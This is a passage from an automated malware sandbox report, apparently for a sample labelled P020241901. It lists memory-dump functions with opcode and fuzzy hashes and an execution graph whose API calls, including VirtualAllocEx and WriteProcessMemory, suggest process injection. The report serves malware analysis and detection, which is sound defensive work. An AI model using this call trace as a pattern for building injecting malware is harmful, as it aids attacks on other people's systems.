                                  • API String ID:
                                  • Opcode ID: 63c23ca723fa56c6cf706c7c5d5d3884462f33f9af64fabd99f2c876183ad14e
                                  • Instruction ID: e23c20eb8b8df8514f940d12f78b42c2ca744c85ac4b1d5bf685324233cce5ff
                                  • Opcode Fuzzy Hash: 63c23ca723fa56c6cf706c7c5d5d3884462f33f9af64fabd99f2c876183ad14e
                                  • Instruction Fuzzy Hash: 6721623C6401414FDF66ABA8EDC8B693769EB45318F104969D00EC72FED724E847CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02801382 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9fb83d4258d68cf3312fe229a3ee1529a5db313aa8b7dafc935665769ee0e02d
                                  • Instruction ID: 97719be8000a7d30530306a0fcd4ff5bb4bd21334d8fb65e37634d9d65288dd5
                                  • Opcode Fuzzy Hash: 9fb83d4258d68cf3312fe229a3ee1529a5db313aa8b7dafc935665769ee0e02d
                                  • Instruction Fuzzy Hash: E7215B38A452414FDFB65668E8DC37D3BA6EB02324F18086DD44EC76E1DB69889AC742
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02804F88 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 02ef98bae4615e0ed0ebb532341922dd51ae6e5fa4e938459760728a98744414
                                  • Instruction ID: f2fdc488767be43a47c10ac4e1e96c7e260bd2a36d7f274a9b9cc5135926d17b
                                  • Opcode Fuzzy Hash: 02ef98bae4615e0ed0ebb532341922dd51ae6e5fa4e938459760728a98744414
                                  • Instruction Fuzzy Hash: 18213C38B002458FDB54DB78C998BAD7BF1BF4D308B100868D406EB3A1DB759C45CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0267D01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3232966101.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_267d000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ea168205ecca937218e75c8766ad2a096b5523ba16824a3864cf4f2c240e070
                                  • Instruction ID: 1445136d5e0cac26a30469e9d4a8d196e9587d1f0afdec7db75584c350dcc365
                                  • Opcode Fuzzy Hash: 5ea168205ecca937218e75c8766ad2a096b5523ba16824a3864cf4f2c240e070
                                  • Instruction Fuzzy Hash: 0821F275604284DFDB14DF24E984B26BF65FF88314F24C96DD90A4B396C33AD447CA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02809A28 Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 363f33c17566c9220b8cbb98b59e6163f536512717812d1b44f63cd02951deb2
                                  • Instruction ID: 6040980b1b5364668a2956545e22531da05cea1e81c09bf804d174fcc07919a1
                                  • Opcode Fuzzy Hash: 363f33c17566c9220b8cbb98b59e6163f536512717812d1b44f63cd02951deb2
                                  • Instruction Fuzzy Hash: 9421A179B101058FEB54DB6ACC94BAE7BF6BF88B14F148069E505EB3E1DB719C008B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02809160 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27c275e098286a4a457b40c6d9f942757abc97d63fd1ca840cbb2a9c2755b7d7
                                  • Instruction ID: 09441d73c42e16e40724dcd2f8ec6a9e5ce6e4578b6572b6a90609972c48b01b
                                  • Opcode Fuzzy Hash: 27c275e098286a4a457b40c6d9f942757abc97d63fd1ca840cbb2a9c2755b7d7
                                  • Instruction Fuzzy Hash: 4121A738E0020A9BCB18CFA4DD946DEF7B2AF89700F10852AE815F7391DB70AC45CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02801888 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c35997cc05975f9a488740acf8997df7f6068f6dad0a227842e60d3451a61e7b
                                  • Instruction ID: e6f06919c40699585617358c2256867204a6b4d7e03c42cf2f3165e738ebfef3
                                  • Opcode Fuzzy Hash: c35997cc05975f9a488740acf8997df7f6068f6dad0a227842e60d3451a61e7b
                                  • Instruction Fuzzy Hash: 31217F38B00205CFDB94EB78C9987AD77F6AB49315F500468D10AEB390DF359D41CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 028016B0 Relevance: .1, Instructions: 69COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d5a21ab75b8867e022c5b8cb81d6d5a18788b34a328d6707564aade7f7fcd033
                                  • Instruction ID: 6ddb2ab39040c1bb2f131a4aebbf94b82bb243df38f8d0d67892a501c6938d16
                                  • Opcode Fuzzy Hash: d5a21ab75b8867e022c5b8cb81d6d5a18788b34a328d6707564aade7f7fcd033
                                  • Instruction Fuzzy Hash: 5621BE3C6501014FDF66ABA8EDC8B693769EB45328F104A25D00EC72FDDB69E8468B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0280187A Relevance: .1, Instructions: 69COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad2acf81ea89b979b92c05dfd39df926448dde3eb1fa5fda76dc3686301ec7e5
                                  • Instruction ID: 26ff944a1b62a509d9cf83dfe4f58681552f52a929265687309d683e630ae834
                                  • Opcode Fuzzy Hash: ad2acf81ea89b979b92c05dfd39df926448dde3eb1fa5fda76dc3686301ec7e5
                                  • Instruction Fuzzy Hash: 4D214C38B00245CFDB94EB78C9987AD77F2AF88315F540469D10AEB3A0DB368D41CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02804F98 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c935bb796a73fd05d35d7f7e003a0f432a3108e40ccfdc40ec25082ddea0a2d0
                                  • Instruction ID: 189e12e17712eee1cb5af384cc546cf923464d5720b6f01111f9fd6b198c8711
                                  • Opcode Fuzzy Hash: c935bb796a73fd05d35d7f7e003a0f432a3108e40ccfdc40ec25082ddea0a2d0
                                  • Instruction Fuzzy Hash: 81211938B40205CFDB54EB78D998BAD77F1BF49704B100868E406EB3A0DB759D45CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02800838 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0bd61c7f465510db652da0babd3e2dd72990bbfb570658d97f98bbcc0accd692
                                  • Instruction ID: 0d43b36c556d26ded66324f5bbf07b5b694bbcf461f950cfeac268e6d712c4a4
                                  • Opcode Fuzzy Hash: 0bd61c7f465510db652da0babd3e2dd72990bbfb570658d97f98bbcc0accd692
                                  • Instruction Fuzzy Hash: 6911043CB042444FEFA156B8ACD47B93765FB82319F14487AD44ACB2C1DB28C8468BC5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02800848 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39cf61f1d78061f2a5be90a7cb4bceaf073e14ca9a2930bf0742e93b09a3cf9e
                                  • Instruction ID: d50f3e1c09f2408061780de1d2cdc9525f09caea80b639d5e1d1a2ca1b231e72
                                  • Opcode Fuzzy Hash: 39cf61f1d78061f2a5be90a7cb4bceaf073e14ca9a2930bf0742e93b09a3cf9e
                                  • Instruction Fuzzy Hash: 2911823CB002088FEF9466B9DD8477A3355FB82319F104879D50ACB3D5DB25D8468BD5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0267D006 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3232966101.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_267d000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a280a4fd0e67636db21dbf0599cb9f2e7f05ab045fb7704d9116f6f7eaabf6fb
                                  • Instruction ID: f04aa9a304ee00677ed5eebb550e59f0af810d96ef68a230a77dee3cf413fa1c
                                  • Opcode Fuzzy Hash: a280a4fd0e67636db21dbf0599cb9f2e7f05ab045fb7704d9116f6f7eaabf6fb
                                  • Instruction Fuzzy Hash: 242181755093C08FDB12CF24D994715BF71EF46214F28C5DAD8898F6A7C33A981ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02801487 Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: efc7a636dcded70e02006d463827a49b34fe695392a21f001e39fd46e4cf0f4e
                                  • Instruction ID: 1281eebbf652da17658291afde8979df803ef8affec6c3967ab3c442295db259
                                  • Opcode Fuzzy Hash: efc7a636dcded70e02006d463827a49b34fe695392a21f001e39fd46e4cf0f4e
                                  • Instruction Fuzzy Hash: 54115839B012558FCB62AF78989429E7BF2AF84314F150479C449E7281D731C842CBD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02801498 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7634e21e33604254393877ccc5fedbedf9b7d55ebb04256fc3575a37242f22e
                                  • Instruction ID: 8d4efdc265a83a61633d64fcd03bb2d5a42275ab71e1bcd890befa8ff69942c7
                                  • Opcode Fuzzy Hash: d7634e21e33604254393877ccc5fedbedf9b7d55ebb04256fc3575a37242f22e
                                  • Instruction Fuzzy Hash: 4101213DA012159FCBA1EFB8889429DB7E6EB48320B154479D809EB380E735C8418B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02801524 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d267c6fccac551344988ef06b43a24e72d1cbbfe2a720480261c50702c72c282
                                  • Instruction ID: 4ac2ba74c8a455e539f314b86335a803141476503dddf9e19dfe49c287784ecc
                                  • Opcode Fuzzy Hash: d267c6fccac551344988ef06b43a24e72d1cbbfe2a720480261c50702c72c282
                                  • Instruction Fuzzy Hash: 17F0F63FA04150CFD7628BA88CD42ACBBA1EE9933571940D7C80EDF691D725D442CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 028080F1 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: efe7718f0d3742273e9e92ed55ca0c8d10c85327e8325601a2ddc6fcd8478976
                                  • Instruction ID: b256cc03dfc1bb6bcc6767f30d0cdcc72ad98421617cfff6927a327eef2e2651
                                  • Opcode Fuzzy Hash: efe7718f0d3742273e9e92ed55ca0c8d10c85327e8325601a2ddc6fcd8478976
                                  • Instruction Fuzzy Hash: 7B0162345141859FCB1AEBA4FA9099D7B79EF41304F0046A8C4015B2B9DF356A17D781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02807090 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51f5cdc676da7cbff0157f77d2296137344c1387accda56cc2c759448c66189f
                                  • Instruction ID: 6f0e8087165c1dac13a81fc74dd0644a8fcf1d4d40da993ac16ab3bc48eeaa37
                                  • Opcode Fuzzy Hash: 51f5cdc676da7cbff0157f77d2296137344c1387accda56cc2c759448c66189f
                                  • Instruction Fuzzy Hash: 88F0C439B402088FC714DB74D6A8BAC77F2EF88715F2144A9E5069B3A4DB35AD02CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02808100 Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b843bffad231e6c835bf43127c17098c62b00b3bfb0e80a6b5d28b58297742bc
                                  • Instruction ID: 6528ccace9756a67c5f416436aeb86702e8898e82c2720e74e3d4583d83d1062
                                  • Opcode Fuzzy Hash: b843bffad231e6c835bf43127c17098c62b00b3bfb0e80a6b5d28b58297742bc
                                  • Instruction Fuzzy Hash: 0BF0CD34940149AFCF19EFA4FA5099D7BB9EF40304F504678C405972A8EB356A1A9B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02806C03 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fea1d43e42189c136875ba0eac20b41cdd1940f6d014ff9cd4bfd99c0fb5f9d7
                                  • Instruction ID: b14b140851bc5c5800fdeb01619b26824798fa2063d316dcdc8e1e27f7c2a2f6
                                  • Opcode Fuzzy Hash: fea1d43e42189c136875ba0eac20b41cdd1940f6d014ff9cd4bfd99c0fb5f9d7
                                  • Instruction Fuzzy Hash: 06E068367881E0CFC7019B3CA8D409ABFB9DFC622530C01DFD089C7282C6228855CBC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:12.1%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:365
                                  Total number of Limit Nodes:20
                                  execution_graph 31894 6b87998 31895 6b87b23 31894->31895 31896 6b879be 31894->31896 31896->31895 31898 6b85f7c 31896->31898 31899 6b87c18 PostMessageW 31898->31899 31900 6b87c84 31899->31900 31900->31896 32174 4bc6cc8 32175 4bc6cf5 32174->32175 32182 4bc6800 32175->32182 32180 4bc6810 3 API calls 32181 4bc6e5e 32180->32181 32183 4bc680b 32182->32183 32190 4bc69a4 32183->32190 32185 4bc6dfa 32186 4bc6810 32185->32186 32187 4bc681b 32186->32187 32188 4bc6b44 3 API calls 32187->32188 32189 4bc6e2c 32188->32189 32189->32180 32191 4bc69af 32190->32191 32193 25183d2 3 API calls 32191->32193 32194 2515c9c 3 API calls 32191->32194 32192 4bc79cc 32192->32185 32193->32192 32194->32192 31901 251d0f8 31902 251d13e 31901->31902 31906 251d2c9 31902->31906 31910 251d2d8 31902->31910 31903 251d22b 31907 251d2d8 31906->31907 31913 251c9e0 31907->31913 31911 251c9e0 DuplicateHandle 31910->31911 31912 251d306 31911->31912 31912->31903 31914 251d340 DuplicateHandle 31913->31914 31915 251d306 31914->31915 31915->31903 32195 2514668 32196 251467a 32195->32196 32199 2514686 32196->32199 32201 2514778 32196->32201 32198 25146a5 32206 2513e10 32199->32206 32202 251479d 32201->32202 32210 2514878 32202->32210 32214 2514888 32202->32214 32207 2513e1b 32206->32207 32222 2515c1c 32207->32222 32209 251702b 32209->32198 32212 25148af 32210->32212 32211 251498c 32211->32211 32212->32211 32218 2514248 32212->32218 32215 25148af 32214->32215 32216 2514248 CreateActCtxA 32215->32216 32217 251498c 32215->32217 32216->32217 32219 2515918 CreateActCtxA 32218->32219 32221 25159db 32219->32221 32223 2515c27 32222->32223 32226 2515c3c 32223->32226 32225 25170d5 32225->32209 32227 2515c47 32226->32227 32230 2515c6c 32227->32230 32229 25171ba 32229->32225 32231 2515c77 32230->32231 32232 2515c9c 3 API calls 32231->32232 32233 25172ad 32232->32233 32233->32229 31768 4bc7c30 31769 4bc7c40 31768->31769 31772 4bc6b44 31769->31772 31771 4bc7c4f 31773 4bc6b4f 31772->31773 31774 4bc7c82 31773->31774 31777 2515c9c 31773->31777 31786 25183d2 31773->31786 31774->31771 31778 2515ca7 31777->31778 31779 2518438 31778->31779 31795 25186e2 31778->31795 31781 2518693 31779->31781 31801 251ad40 31779->31801 31780 25186d1 31780->31774 31781->31780 31805 251ce20 31781->31805 31810 251ce30 31781->31810 31787 251840b 31786->31787 31788 2518438 31787->31788 31794 25186e2 3 API calls 31787->31794 31790 2518693 31788->31790 31791 251ad40 2 API calls 31788->31791 31789 25186d1 31789->31774 31790->31789 31792 251ce30 3 API calls 31790->31792 31793 251ce20 3 API calls 31790->31793 31791->31790 31792->31789 31793->31789 31794->31788 31796 25186a2 31795->31796 31798 25186ef 31795->31798 31797 25186d1 31796->31797 31799 251ce30 3 API calls 31796->31799 31800 251ce20 3 API calls 31796->31800 31797->31779 31798->31779 31799->31797 31800->31797 31815 251ad67 31801->31815 31819 251ad78 31801->31819 31802 251ad56 31802->31781 31806 251ce30 31805->31806 31807 251ce75 31806->31807 31842 251cfe0 31806->31842 31846 251cfb4 31806->31846 31807->31780 31811 251ce51 31810->31811 31812 251ce75 31811->31812 31813 251cfe0 3 API calls 31811->31813 31814 251cfb4 3 API calls 31811->31814 31812->31780 31813->31812 31814->31812 31816 251ad78 31815->31816 31822 251ae70 31816->31822 31817 251ad87 31817->31802 31821 251ae70 2 API calls 31819->31821 31820 251ad87 31820->31802 31821->31820 31823 251ae81 31822->31823 31824 251aea4 31822->31824 31823->31824 31830 251b0f8 31823->31830 31834 251b108 31823->31834 31824->31817 31825 251ae9c 31825->31824 31826 251b0a8 GetModuleHandleW 31825->31826 31827 251b0d5 31826->31827 31827->31817 31832 251b108 31830->31832 31831 251b141 31831->31825 31832->31831 31838 251a8b0 31832->31838 31835 251b11c 31834->31835 31836 251a8b0 LoadLibraryExW 31835->31836 31837 251b141 31835->31837 31836->31837 31837->31825 31839 251b2e8 LoadLibraryExW 31838->31839 31841 251b361 31839->31841 31841->31831 31843 251cfed 31842->31843 31844 251d027 31843->31844 31850 251c918 31843->31850 31844->31807 31847 251cfe0 31846->31847 31848 251d027 31847->31848 31849 251c918 3 API calls 31847->31849 31848->31807 31849->31848 31851 251c923 31850->31851 31853 251d938 31851->31853 31854 251ca44 31851->31854 31853->31853 31855 251ca4f 31854->31855 31856 2515c9c 3 API calls 31855->31856 31857 251d9a7 31856->31857 31861 251f708 31857->31861 31867 251f720 31857->31867 31858 251d9e1 31858->31853 31863 251f851 31861->31863 31864 251f751 31861->31864 31862 251f75d 31862->31858 31863->31858 31864->31862 31873 4bc0db8 31864->31873 31878 4bc0dc8 31864->31878 31869 251f751 31867->31869 31870 251f851 31867->31870 31868 251f75d 31868->31858 31869->31868 31871 4bc0db8 CreateWindowExW 31869->31871 31872 4bc0dc8 CreateWindowExW 31869->31872 31870->31858 31871->31870 31872->31870 31874 4bc0df3 31873->31874 31875 4bc0ea2 31874->31875 31883 4bc1ca0 31874->31883 31886 4bc1c90 31874->31886 31880 4bc0df3 31878->31880 31879 4bc0ea2 31879->31879 31880->31879 31881 4bc1ca0 CreateWindowExW 31880->31881 31882 4bc1c90 CreateWindowExW 31880->31882 31881->31879 31882->31879 31890 4bc0aa8 31883->31890 31887 4bc1ca0 31886->31887 31888 4bc0aa8 CreateWindowExW 31887->31888 31889 4bc1cd5 31888->31889 31889->31875 31891 4bc1cf0 CreateWindowExW 31890->31891 31893 4bc1e14 31891->31893 31916 b0d01c 31917 b0d034 31916->31917 31918 b0d08e 31917->31918 31923 4bc2c08 31917->31923 31933 4bc1ea8 31917->31933 31937 4bc1e97 31917->31937 31941 4bc0ad4 31917->31941 31924 4bc2bfb 31923->31924 31926 4bc2c0e 31923->31926 31924->31918 31925 4bc2c79 31967 4bc0bfc 31925->31967 31926->31925 31928 4bc2c69 31926->31928 31950 4bc2e6c 31928->31950 31956 4bc2d90 31928->31956 31962 4bc2da0 31928->31962 31929 4bc2c77 31929->31929 31934 4bc1ece 31933->31934 31935 4bc0ad4 CallWindowProcW 31934->31935 31936 4bc1eef 31935->31936 31936->31918 31938 4bc1ea8 31937->31938 31939 4bc0ad4 CallWindowProcW 31938->31939 31940 4bc1eef 31939->31940 31940->31918 31942 4bc0adf 31941->31942 31943 4bc2c79 31942->31943 31945 4bc2c69 31942->31945 31944 4bc0bfc CallWindowProcW 31943->31944 31946 4bc2c77 31944->31946 31947 4bc2e6c CallWindowProcW 31945->31947 31948 4bc2da0 CallWindowProcW 31945->31948 31949 4bc2d90 CallWindowProcW 31945->31949 31946->31946 31947->31946 31948->31946 31949->31946 31951 4bc2e2a 31950->31951 31952 4bc2e7a 31950->31952 31971 4bc2e58 31951->31971 31974 4bc2e47 31951->31974 31953 4bc2e40 31953->31929 31957 4bc2d88 31956->31957 31959 4bc2d9a 31956->31959 31957->31929 31958 4bc2e40 31958->31929 31960 4bc2e58 CallWindowProcW 31959->31960 31961 4bc2e47 CallWindowProcW 31959->31961 31960->31958 31961->31958 31964 4bc2db4 31962->31964 31963 4bc2e40 31963->31929 31965 4bc2e58 CallWindowProcW 31964->31965 31966 4bc2e47 CallWindowProcW 31964->31966 31965->31963 31966->31963 31968 4bc0c07 31967->31968 31969 4bc435a CallWindowProcW 31968->31969 31970 4bc4309 31968->31970 31969->31970 31970->31929 31972 4bc2e69 31971->31972 31978 4bc429e 31971->31978 31972->31953 31975 4bc2e55 31974->31975 31976 4bc2e69 31975->31976 31977 4bc429e CallWindowProcW 31975->31977 31976->31953 31977->31976 31979 4bc0bfc CallWindowProcW 31978->31979 31980 4bc42aa 31979->31980 31980->31972 31981 6b85396 31982 6b850ec 31981->31982 31983 6b85150 31982->31983 31987 6b868de 31982->31987 32006 6b86871 31982->32006 32024 6b86880 31982->32024 31988 6b8686c 31987->31988 31989 6b868e1 31987->31989 32042 6b8716e 31988->32042 32047 6b8736d 31988->32047 32054 6b86eab 31988->32054 32061 6b870ca 31988->32061 32066 6b86f4a 31988->32066 32070 6b86fa9 31988->32070 32075 6b87034 31988->32075 32080 6b86fd2 31988->32080 32087 6b86cb0 31988->32087 32091 6b86e5f 31988->32091 32096 6b86d07 31988->32096 32103 6b873c4 31988->32103 32110 6b86d23 31988->32110 32117 6b87421 31988->32117 32121 6b87061 31988->32121 31989->31983 31990 6b868be 31990->31983 32007 6b8689a 32006->32007 32009 6b86e5f 2 API calls 32007->32009 32010 6b86cb0 2 API calls 32007->32010 32011 6b86fd2 4 API calls 32007->32011 32012 6b87034 2 API calls 32007->32012 32013 6b86fa9 2 API calls 32007->32013 32014 6b86f4a 2 API calls 32007->32014 32015 6b870ca 2 API calls 32007->32015 32016 6b86eab 4 API calls 32007->32016 32017 6b8736d 4 API calls 32007->32017 32018 6b8716e 2 API calls 32007->32018 32019 6b87061 2 API calls 32007->32019 32020 6b87421 2 API calls 32007->32020 32021 6b86d23 4 API calls 32007->32021 32022 6b873c4 4 API calls 32007->32022 32023 6b86d07 4 API calls 32007->32023 32008 6b868be 32008->31983 32009->32008 32010->32008 32011->32008 32012->32008 32013->32008 32014->32008 32015->32008 32016->32008 32017->32008 32018->32008 32019->32008 32020->32008 32021->32008 32022->32008 32023->32008 32025 6b8689a 32024->32025 32027 6b86e5f 2 API calls 32025->32027 32028 6b86cb0 2 API calls 32025->32028 32029 6b86fd2 4 API calls 32025->32029 32030 6b87034 2 API calls 32025->32030 32031 6b86fa9 2 API calls 32025->32031 32032 6b86f4a 2 API calls 32025->32032 32033 6b870ca 2 API calls 32025->32033 32034 6b86eab 4 API calls 32025->32034 32035 6b8736d 4 API calls 32025->32035 32036 6b8716e 2 API calls 32025->32036 32037 6b87061 2 API calls 32025->32037 32038 6b87421 2 API calls 32025->32038 32039 6b86d23 4 API calls 32025->32039 32040 6b873c4 4 API calls 32025->32040 32041 6b86d07 4 API calls 32025->32041 32026 6b868be 32026->31983 32027->32026 32028->32026 32029->32026 32030->32026 32031->32026 32032->32026 32033->32026 32034->32026 32035->32026 32036->32026 32037->32026 32038->32026 32039->32026 32040->32026 32041->32026 32043 6b87174 32042->32043 32044 6b8756a 32043->32044 32126 6b847ff 32043->32126 32130 6b84800 32043->32130 32048 6b86d0f 32047->32048 32048->31990 32049 6b87551 32048->32049 32134 6b84a48 32048->32134 32138 6b84a40 32048->32138 32142 6b84988 32048->32142 32146 6b84980 32048->32146 32049->31990 32055 6b86d0f 32054->32055 32055->31990 32056 6b87551 32055->32056 32057 6b84988 VirtualAllocEx 32055->32057 32058 6b84980 VirtualAllocEx 32055->32058 32059 6b84a48 WriteProcessMemory 32055->32059 32060 6b84a40 WriteProcessMemory 32055->32060 32056->31990 32057->32055 32058->32055 32059->32055 32060->32055 32062 6b87082 32061->32062 32062->32061 32150 6b848a8 32062->32150 32154 6b848b0 32062->32154 32063 6b87285 32158 6b84b38 32066->32158 32162 6b84b37 32066->32162 32067 6b86f6c 32071 6b86fcc 32070->32071 32073 6b84a48 WriteProcessMemory 32071->32073 32074 6b84a40 WriteProcessMemory 32071->32074 32072 6b87454 32073->32072 32074->32072 32076 6b874ce 32075->32076 32078 